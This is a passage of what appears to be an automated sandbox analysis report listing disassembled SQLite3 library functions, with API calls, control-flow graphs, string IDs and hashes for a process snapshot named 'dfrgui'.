                                                                                              • sqlite3_errcode.SQLITE3 ref: 61E932F1
                                                                                              • sqlite3_close.SQLITE3 ref: 61E93302
                                                                                              • sqlite3_free.SQLITE3 ref: 61E9331F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_create_function$sqlite3_freesqlite3_mutex_enter$sqlite3_mutex_leave$memcmpsqlite3_closesqlite3_configsqlite3_errcodesqlite3_initializesqlite3_malloc64
                                                                                              • String ID: BINARY$NOCASE$RTRIM$`1a$fts3$fts4$fts5$fts5vocab$h,a$porter$rtree$rtree_i32$simple$unicode61
                                                                                              • API String ID: 1097977795-3723990393
                                                                                              • Opcode ID: 34542269ac24add44832506ab8adc97a24ce565a994c45d636892361de556e6e
                                                                                              • Instruction ID: 04396e4e8c081e79777a81cb76cfc5092588615b200e9ca745df3807d6096530
                                                                                              • Opcode Fuzzy Hash: 34542269ac24add44832506ab8adc97a24ce565a994c45d636892361de556e6e
                                                                                              • Instruction Fuzzy Hash: FE7206B0A083428BE700DF69C49534ABBE1BF95708F25CC2DE8999B395D779C845CB82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E19553 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSystemInfo.KERNEL32(?,?,61EAE400,?,61E19320,?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1956D
                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E19583
                                                                                                • Part of subcall function 61E194F0: sqlite3_initialize.SQLITE3(?,?,61E19588), ref: 61E194FB
                                                                                                • Part of subcall function 61E194F0: sqlite3_mutex_enter.SQLITE3(?,?,61E19588), ref: 61E19513
                                                                                                • Part of subcall function 61E194F0: sqlite3_mutex_leave.SQLITE3(?), ref: 61E19545
                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E19597
                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E195AB
                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E195BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_vfs_register$InfoSystemsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 3532963230-0
                                                                                              • Opcode ID: af9367acd9bb657ed331947dda9311c1f067872b8ef6359b94e462143c9243d0
                                                                                              • Instruction ID: 6d0d412f49644ea53ed79f6f68b23b94a644fcacb4ad3fcd9eba45d30bda88e5
                                                                                              • Opcode Fuzzy Hash: af9367acd9bb657ed331947dda9311c1f067872b8ef6359b94e462143c9243d0
                                                                                              • Instruction Fuzzy Hash: 23F0F9B0548641ABD700AFA9C18675FBBE5AFC2708F22C82CD4858B295C7B5C8448B93
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E48A10 Relevance: 41.0, APIs: 21, Strings: 2, Instructions: 760stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_enter$strcmp
                                                                                              • String ID: -journal$@
                                                                                              • API String ID: 42632313-41206085
                                                                                              • Opcode ID: 40c689dc1cc61a3de58058952e5f429362b20efe2b2a30fe5884249aaa52c7a5
                                                                                              • Instruction ID: fad57ea04c3ed1a2a289cc891a4be8110211e8b1c2718681ceb6113754037920
                                                                                              • Opcode Fuzzy Hash: 40c689dc1cc61a3de58058952e5f429362b20efe2b2a30fe5884249aaa52c7a5
                                                                                              • Instruction Fuzzy Hash: 29820574A04259CFEB20CF68C984B89BBF1BF49308F2981E9D858AB352D774D985CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E19104 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 200COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 392 61e19104-61e1910d 393 61e19113-61e19125 call 61e08e53 392->393 394 61e19455 392->394 397 61e1912b-61e19151 call 61e01713 sqlite3_mutex_enter 393->397 398 61e1944e-61e19454 393->398 401 61e19157-61e1915e 397->401 402 61e191ee-61e191ff 397->402 398->394 405 61e19160-61e1916f sqlite3_config 401->405 406 61e19174-61e1919a call 61e01713 401->406 403 61e19221-61e19246 sqlite3_mutex_leave sqlite3_mutex_enter 402->403 404 61e19201-61e19217 call 61e01713 402->404 407 61e1924c-61e19253 403->407 408 61e193ef-61e19414 sqlite3_mutex_leave sqlite3_mutex_enter 403->408 404->403 419 61e19219-61e1921b 404->419 405->406 417 61e191b1-61e191bb 406->417 418 61e1919c-61e191a6 406->418 407->408 411 61e19259-61e192b6 call 61e10d4d * 4 407->411 412 61e19416-61e19423 sqlite3_mutex_free 408->412 413 61e1942d-61e1943a sqlite3_mutex_leave 408->413 433 61e192b8-61e192d5 sqlite3_malloc 411->433 434 61e192dc-61e192e3 411->434 412->413 413->398 422 61e191c5-61e191d7 417->422 418->417 421 61e191a8-61e191af 418->421 419->403 423 61e1943c 419->423 421->417 421->422 422->402 429 61e191d9-61e191e9 422->429 425 61e19441-61e1944c sqlite3_mutex_leave 423->425 425->398 429->425 435 61e19313-61e19324 sqlite3_free sqlite3_os_init 433->435 436 61e192d7 433->436 437 61e192e5-61e192f4 sqlite3_config 434->437 438 61e192f9-61e1930b 434->438 439 61e193e5 435->439 440 61e1932a-61e19331 435->440 436->439 437->438 438->439 444 61e19311 438->444 439->408 442 61e19337-61e1934a 440->442 443 61e193db 440->443 445 61e19353-61e19355 442->445 446 61e1934c-61e19351 442->446 443->439 444->433 447 61e19357-61e19376 445->447 446->447 448 61e19380-61e193a7 447->448 449 61e19378-61e1937d 447->449 450 61e193ab-61e193b2 448->450 449->448 451 61e193c3-61e193cd 450->451 452 61e193b4-61e193c1 450->452 453 61e193d5 451->453 454 61e193cf 451->454 452->450 453->443 454->453
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1913B
                                                                                              • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E1916F
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1922D
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1923A
                                                                                              • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E192CE
                                                                                              • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E212EB), ref: 61E192F4
                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19316
                                                                                              • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1931B
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E193F7
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19402
                                                                                              • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E1941E
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19433
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19447
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_config$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                              • String ID: `Aa
                                                                                              • API String ID: 1590227068-4150638200
                                                                                              • Opcode ID: 3dc21433d400701e44026c1dc62b4f0183e2b2090de9d18710cf785c8c7a32fa
                                                                                              • Instruction ID: b8cb39d1aa9a75ed5e5362b64b399c3cfccd9f63d9053fb2d41c374444a4c4a7
                                                                                              • Opcode Fuzzy Hash: 3dc21433d400701e44026c1dc62b4f0183e2b2090de9d18710cf785c8c7a32fa
                                                                                              • Instruction Fuzzy Hash: EB813E70A58A458FEF049FA9C4853597AF1BFCA319F24882ED844DB394EB79C8C5CB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3E688 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 296fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 455 61e3e688-61e3e6c6 456 61e3e6e6-61e3e6f3 call 61e18b42 455->456 457 61e3e6c8-61e3e6da call 61e3e3a1 455->457 464 61e3e6f5-61e3e705 sqlite3_free 456->464 465 61e3e70a-61e3e712 456->465 462 61e3e6e0-61e3e6e3 457->462 463 61e3eabc-61e3eac5 457->463 462->456 464->463 466 61e3e714-61e3e72b 465->466 467 61e3e72d-61e3e734 sqlite3_win32_is_nt 465->467 468 61e3e756-61e3e773 466->468 467->466 469 61e3e736-61e3e743 467->469 472 61e3e745-61e3e754 call 61e189f3 468->472 473 61e3e775 468->473 474 61e3e778-61e3e77b 469->474 472->468 479 61e3e7a9-61e3e7d8 472->479 473->474 475 61e3e7a7 474->475 476 61e3e77d-61e3e785 474->476 475->479 478 61e3e787-61e3e7a2 sqlite3_free * 2 476->478 476->479 478->463 481 61e3e7da-61e3e7e8 479->481 482 61e3e7ec-61e3e810 479->482 481->482 483 61e3e812-61e3e819 sqlite3_win32_is_nt 482->483 484 61e3e81f-61e3e860 CreateFileW 482->484 483->484 485 61e3e8e2-61e3e923 483->485 486 61e3e971-61e3e981 call 61e238ff 484->486 487 61e3e866-61e3e86a 484->487 496 61e3e925 485->496 497 61e3e8cd-61e3e8d1 485->497 499 61e3e987-61e3e9a1 sqlite3_free * 2 486->499 500 61e3ea09-61e3ea0d 486->500 489 61e3e8b2-61e3e8bf call 61e189f3 487->489 490 61e3e86c-61e3e8a6 call 61e016d8 call 61e2393e call 61e016e9 487->490 489->484 504 61e3e8c5-61e3e8c8 489->504 490->489 530 61e3e8a8-61e3e8ac 490->530 496->486 505 61e3e8d3-61e3e8e0 call 61e189f3 497->505 506 61e3e927-61e3e961 call 61e016d8 call 61e2393e call 61e016e9 497->506 507 61e3e9a3-61e3e9a7 499->507 508 61e3e9d5-61e3e9fd call 61e22ebc call 61e24025 499->508 502 61e3ea0f-61e3ea1b 500->502 503 61e3ea1d-61e3ea46 sqlite3_free * 2 500->503 502->503 512 61e3ea4a-61e3ea59 503->512 513 61e3ea48 503->513 504->486 505->485 505->504 506->505 534 61e3e967-61e3e96b 506->534 507->508 515 61e3e9a9-61e3e9d3 call 61e3e688 507->515 529 61e3ea02-61e3ea04 508->529 520 61e3ea5b 512->520 521 61e3ea5f-61e3ea7c sqlite3_uri_boolean 512->521 513->512 515->529 520->521 527 61e3ea82-61e3eab9 521->527 528 61e3ea7e 521->528 527->463 528->527 529->463 530->486 530->489 534->486 534->505
                                                                                              APIs
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E700
                                                                                                • Part of subcall function 61E3E3A1: sqlite3_free.SQLITE3 ref: 61E3E413
                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E3E72D
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E792
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E79D
                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E3E812
                                                                                              • CreateFileW.KERNEL32 ref: 61E3E852
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E98D
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E998
                                                                                                • Part of subcall function 61E189F3: sqlite3_win32_sleep.SQLITE3 ref: 61E18A4B
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3EA2C
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3EA37
                                                                                              • sqlite3_uri_boolean.SQLITE3 ref: 61E3EA75
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_win32_is_nt$CreateFilesqlite3_uri_booleansqlite3_win32_sleep
                                                                                              • String ID: winOpen
                                                                                              • API String ID: 1995518269-2556188131
                                                                                              • Opcode ID: 2433654a142791891781cac68bed4388ded419e5e0d7d29fd9d0943fb19c1bd9
                                                                                              • Instruction ID: 90af8dfd4577a76acb09c138b1361f2ecc4fcac60cf97447081b4db11295945f
                                                                                              • Opcode Fuzzy Hash: 2433654a142791891781cac68bed4388ded419e5e0d7d29fd9d0943fb19c1bd9
                                                                                              • Instruction Fuzzy Hash: C5D1B5749047598FEB10DFAAC48578EBBF0BF84358F248929E8A49B390E774D985CF41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E642B1 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 229COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 535 61e642b1-61e6433f call 61e72f0b 538 61e64584-61e64588 535->538 539 61e64345-61e64359 535->539 540 61e64593-61e64595 call 61e0aaa8 538->540 541 61e6458a-61e64591 538->541 542 61e6435b-61e64363 539->542 543 61e64368-61e6437b call 61e13faa 539->543 544 61e6459a-61e645a4 call 61e157ff 540->544 541->540 541->544 546 61e645b8-61e645cc 542->546 551 61e643ac-61e643af 543->551 552 61e6437d-61e64381 call 61e41a63 543->552 544->546 553 61e643b6-61e643cd call 61e14319 551->553 556 61e64386-61e64391 552->556 560 61e643cf-61e643d3 553->560 556->551 558 61e64393-61e643a7 call 61e0c26e call 61e121f1 556->558 573 61e64576-61e64582 call 61e0b1a9 558->573 562 61e643d5-61e643df 560->562 563 61e643e1-61e643ee 560->563 562->563 565 61e643f0-61e643f4 563->565 566 61e64411-61e6441b 563->566 569 61e643f6-61e64400 565->569 570 61e64402-61e6440d 565->570 567 61e64420-61e64430 566->567 571 61e64432-61e6444c call 61e01f64 call 61e1476c 567->571 572 61e64451-61e64461 567->572 569->567 574 61e64475-61e6448a call 61e121f1 570->574 575 61e6440f 570->575 571->572 578 61e64467-61e6446e 572->578 579 61e64463 572->579 573->538 573->546 587 61e64490-61e645ae call 61e0b1a9 574->587 588 61e6456e-61e64571 call 61e4788c 574->588 575->567 583 61e64495-61e64498 578->583 584 61e64470 578->584 579->578 589 61e6449a-61e6449e 583->589 590 61e644a8-61e64524 call 61e2dd73 sqlite3_exec call 61e0fc6a 583->590 584->574 587->538 588->573 589->590 594 61e644a0-61e644a4 589->594 600 61e64526-61e6452b call 61e641d7 590->600 601 61e64530-61e64534 590->601 594->590 600->601 603 61e64536-61e64542 call 61e15858 601->603 604 61e64544-61e64546 601->604 606 61e6455f-61e64563 603->606 604->606 607 61e64548-61e6455b 604->607 606->607 611 61e64565-61e6456c 606->611 609 61e645b0-61e645b3 call 61e0b1a9 607->609 610 61e6455d 607->610 609->546 610->588 611->573 611->588
                                                                                              Strings
                                                                                              • sqlite_master, xrefs: 61E642C9
                                                                                              • sqlite_temp_master, xrefs: 61E642CF
                                                                                              • unsupported file format, xrefs: 61E64470
                                                                                              • attached databases must use the same text encoding as main database, xrefs: 61E64406
                                                                                              • Va, xrefs: 61E642FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Va$attached databases must use the same text encoding as main database$sqlite_master$sqlite_temp_master$unsupported file format
                                                                                              • API String ID: 0-1175239378
                                                                                              • Opcode ID: f5fa7c1be61233e57696f3a6f84755a70697a207930041fbbaf071b09d031384
                                                                                              • Instruction ID: 93b59210f787bba4d718a7916ed7ffc49a752ed9f319999632f18046b431d1aa
                                                                                              • Opcode Fuzzy Hash: f5fa7c1be61233e57696f3a6f84755a70697a207930041fbbaf071b09d031384
                                                                                              • Instruction Fuzzy Hash: 8FA11174A443498BEB10CFA9C490B8DBBF5BF89318F60C56ED868AB355D734E845CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E41A63 Relevance: 8.0, APIs: 4, Strings: 1, Instructions: 464COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 613 61e41a63-61e41a81 call 61e13faa 616 61e42026-61e4202a 613->616 617 61e41a87-61e41a89 613->617 618 61e4203c-61e42040 616->618 619 61e4202c-61e4203a 616->619 620 61e41a95-61e41a9b 617->620 621 61e41a8b-61e41a8f 617->621 622 61e42042-61e42044 618->622 623 61e4204c-61e42059 618->623 619->618 624 61e41a9d-61e41aa3 620->624 625 61e41aaa-61e41ab0 620->625 621->616 621->620 626 61e42072-61e42088 call 61e0b1a9 622->626 623->622 627 61e4205b-61e4205f 623->627 624->625 628 61e41aa5 624->628 629 61e41ab2-61e41abb 625->629 630 61e41ac3-61e41ac7 625->630 627->622 631 61e42061-61e42068 call 61e1310c 627->631 628->625 629->626 633 61e41ac1 629->633 634 61e41acf-61e41ad1 630->634 635 61e41ac9-61e41acd 630->635 631->626 633->634 636 61e41ad3-61e41ad8 634->636 637 61e41ada-61e41ade 634->637 635->634 635->636 640 61e41af6-61e41afd 636->640 641 61e41ae0 637->641 642 61e41b03-61e41b18 call 61e029fb 637->642 640->626 640->642 644 61e41ae3-61e41ae5 641->644 642->626 650 61e41b1e-61e41b2d 642->650 644->642 646 61e41ae7-61e41aeb 644->646 648 61e41af1-61e41af4 646->648 649 61e41aed-61e41aef 646->649 648->644 649->640 651 61e41b36-61e41b3b 650->651 652 61e41b2f-61e41b32 650->652 653 61e41b3e-61e41b42 651->653 652->651 654 61e41df0-61e41df2 653->654 655 61e41b48-61e41b53 call 61e40b41 653->655 657 61e41df8-61e41dfc 654->657 658 61e41f5b-61e41f5d 654->658 655->654 663 61e41b59-61e41b6a call 61e02ddd 655->663 657->658 660 61e41e02-61e41e06 657->660 661 61e41f5f-61e41f61 658->661 662 61e41f68-61e41f72 call 61e40933 658->662 664 61e41f63 660->664 665 61e41e0c-61e41e13 660->665 666 61e41f75-61e41f78 661->666 662->666 676 61e41b6f-61e41b73 663->676 664->662 669 61e41f30-61e41f36 665->669 670 61e41e19-61e41e27 665->670 672 61e41f9f-61e41fa1 666->672 673 61e41f7a-61e41f7e 666->673 669->662 674 61e41f38-61e41f4a 669->674 677 61e41f4c-61e41f50 670->677 678 61e41e2d-61e41e35 670->678 672->626 675 61e41fa7-61e41fab 672->675 673->626 679 61e41f84-61e41f94 call 61e0549e 673->679 674->662 681 61e41fc6-61e41fd5 675->681 682 61e41fad-61e41fb4 675->682 676->654 683 61e41b79-61e41b96 676->683 677->661 680 61e41f52-61e41f59 call 61e419ab 677->680 684 61e41f06-61e41f18 call 61e15d18 678->684 685 61e41e3b-61e41e3f 678->685 679->653 697 61e41f9a 679->697 680->658 689 61e41fd7 681->689 690 61e41fda-61e41fde 681->690 682->681 688 61e41fb6-61e41fc3 682->688 691 61e41bcc-61e41bcf 683->691 692 61e41b98-61e41bca memcmp 683->692 712 61e41f2c-61e41f2e 684->712 713 61e41f1a-61e41f1c 684->713 693 61e41e41-61e41e45 685->693 694 61e41e7b-61e41e88 685->694 688->681 689->690 700 61e41fe4-61e41ff5 690->700 701 61e4206a-61e4206e 690->701 699 61e41bd2-61e41bd9 691->699 692->699 693->694 702 61e41e47-61e41e57 call 61e15d18 693->702 694->664 704 61e41e8e-61e41e9e call 61e0b131 694->704 697->626 706 61e41d63 699->706 707 61e41bdf-61e41be3 699->707 708 61e41ff7 700->708 709 61e41ffa-61e42009 700->709 701->619 711 61e42070 701->711 702->669 725 61e41e5d-61e41e77 call 61e0b10f 702->725 704->669 722 61e41ea4-61e41ecc memcmp 704->722 715 61e41d6a-61e41dca 706->715 707->715 716 61e41be9-61e41c09 memcmp 707->716 708->709 718 61e42046-61e4204a 709->718 719 61e4200b-61e42017 call 61e3f5ba 709->719 711->622 712->669 721 61e41ece-61e41eec 712->721 713->712 720 61e41f1e-61e41f2a call 61e15d67 713->720 715->653 723 61e41dcf 716->723 724 61e41c0f-61e41c19 716->724 718->619 718->623 719->626 739 61e42019-61e42024 719->739 720->712 721->677 722->721 728 61e41eee-61e41f04 call 61e0b18c 722->728 729 61e41dd4-61e41de6 call 61e4090c 723->729 730 61e41c20-61e41c27 724->730 731 61e41c1b 724->731 725->694 728->674 746 61e41de8-61e41dea 729->746 730->723 738 61e41c2d 730->738 731->730 742 61e41c6e-61e41c91 memcmp 738->742 743 61e41c2f-61e41c33 738->743 739->718 742->723 745 61e41c97-61e41cb5 742->745 743->742 744 61e41c35-61e41c4d call 61e94f53 743->744 744->729 751 61e41c53-61e41c5a 744->751 745->723 748 61e41cbb-61e41cc6 745->748 746->653 746->654 748->723 750 61e41ccc-61e41ce3 748->750 752 61e41ce5-61e41d13 call 61e4090c call 61e0b271 call 61e14925 750->752 753 61e41d18-61e41d24 750->753 751->742 756 61e41c5c-61e41c69 call 61e4090c 751->756 752->746 754 61e41d26-61e41d2c 753->754 755 61e41d3f-61e41d45 753->755 754->755 758 61e41d2e-61e41d3a call 61e2405a 754->758 755->723 760 61e41d4b-61e41d61 755->760 756->653 758->729 760->715
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
